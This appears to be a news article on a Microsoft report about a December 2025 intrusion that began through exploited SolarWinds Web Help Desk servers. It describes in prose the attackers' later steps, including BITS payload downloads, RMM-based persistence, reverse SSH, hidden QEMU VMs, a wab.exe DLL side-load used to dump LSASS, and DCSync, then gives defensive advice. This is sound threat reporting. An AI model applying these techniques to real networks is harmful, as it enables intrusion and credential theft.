Microsoft has recently detailed a sophisticated multi-stage intrusion that began with threat actors exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances. This initial access point allowed attackers to move laterally within the victim’s network and target high-value assets. The incident, which occurred in December 2025, highlights ongoing cybersecurity challenges and the critical need for timely patching of internet-facing services.
Microsoft’s Defender Security Research Team observed the attackers leveraging vulnerabilities in the SolarWinds WHD software to gain a foothold. While the exact flaw remains unconfirmed, speculation points to either recently disclosed vulnerabilities (CVE-2025-40551 and CVE-2025-40536) or a previously patched flaw (CVE-2025-26399). Researchers noted that the attacks coincided with machines being vulnerable to both older and newer CVEs, making precise attribution difficult.
Exploiting SolarWinds WHD for Initial Access
The vulnerabilities in question present significant security risks. CVE-2025-40536 is described as a security control bypass flaw, potentially allowing unauthenticated attackers to access restricted functionalities. Both CVE-2025-40551 and CVE-2025-26399 are untrusted data deserialization vulnerabilities, which could enable remote code execution. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of its active exploitation and mandating fixes for federal agencies by early February 2026.
In the observed attacks, the successful exploitation of an exposed SolarWinds WHD instance granted attackers the ability to execute remote code without authentication. This allowed them to run arbitrary commands within the WHD application. According to the research team, the compromised WHD service subsequently launched PowerShell, utilizing the Background Intelligent Transfer Service (BITS) to download and execute malicious payloads.
Lateral Movement and Persistence Techniques
Following the initial compromise, the threat actors employed legitimate components associated with Zoho ManageEngine, a remote monitoring and management (RMM) solution, to establish persistent remote control over the infected systems. This allowed them to further their objectives within the network.
The attackers then proceeded with a series of covert actions aimed at escalating their privileges and maintaining access. This included enumerating sensitive domain users and groups, with a particular focus on Domain Admins. To ensure persistence, they established reverse SSH and RDP access. Additionally, the attackers attempted to create scheduled tasks designed to launch a QEMU virtual machine during system startup, a tactic potentially used to mask their activities within a virtualized environment while simultaneously exposing SSH access through port forwarding.
In some instances, the attackers utilized a DLL side-loading technique on compromised hosts. They leveraged “wab.exe,” a legitimate executable file linked to Windows Address Book, to load a rogue DLL named “sspicli.dll.” This malicious DLL was used to dump the contents of LSASS memory, a critical step in conducting credential theft and gaining access to sensitive user information.
Microsoft further reported that, in at least one observed case, the threat actors executed a DCSync attack. This technique involves simulating a Domain Controller to request password hashes and other sensitive authentication data directly from the Active Directory database, providing attackers with a broad set of credentials.
Recommendations and Future Outlook
To mitigate the risks associated with such intrusions, Microsoft advises organizations to keep their SolarWinds WHD instances up-to-date with the latest security patches. They also recommend actively searching for and removing any unauthorized RMM tools, rotating service and administrator account credentials periodically, and isolating compromised machines to contain potential breaches. This incident underscores the significant risk posed by a single exposed application when vulnerabilities are not promptly addressed or adequately monitored.
The attackers’ reliance on “living-off-the-land” techniques, utilizing legitimate administrative tools and low-noise persistence mechanisms, highlights the growing sophistication of threat actors. These tactics emphasize the importance of a defense-in-depth strategy, which includes timely patching of all internet-facing services and robust, behavior-based detection capabilities across identity, endpoint, and network layers. Organizations should remain vigilant, as the exploitation of such vulnerabilities is likely to continue as attackers seek easier routes into corporate networks. The ongoing efforts by CISA and Microsoft to identify and publicize these threats are crucial for improving overall cybersecurity resilience.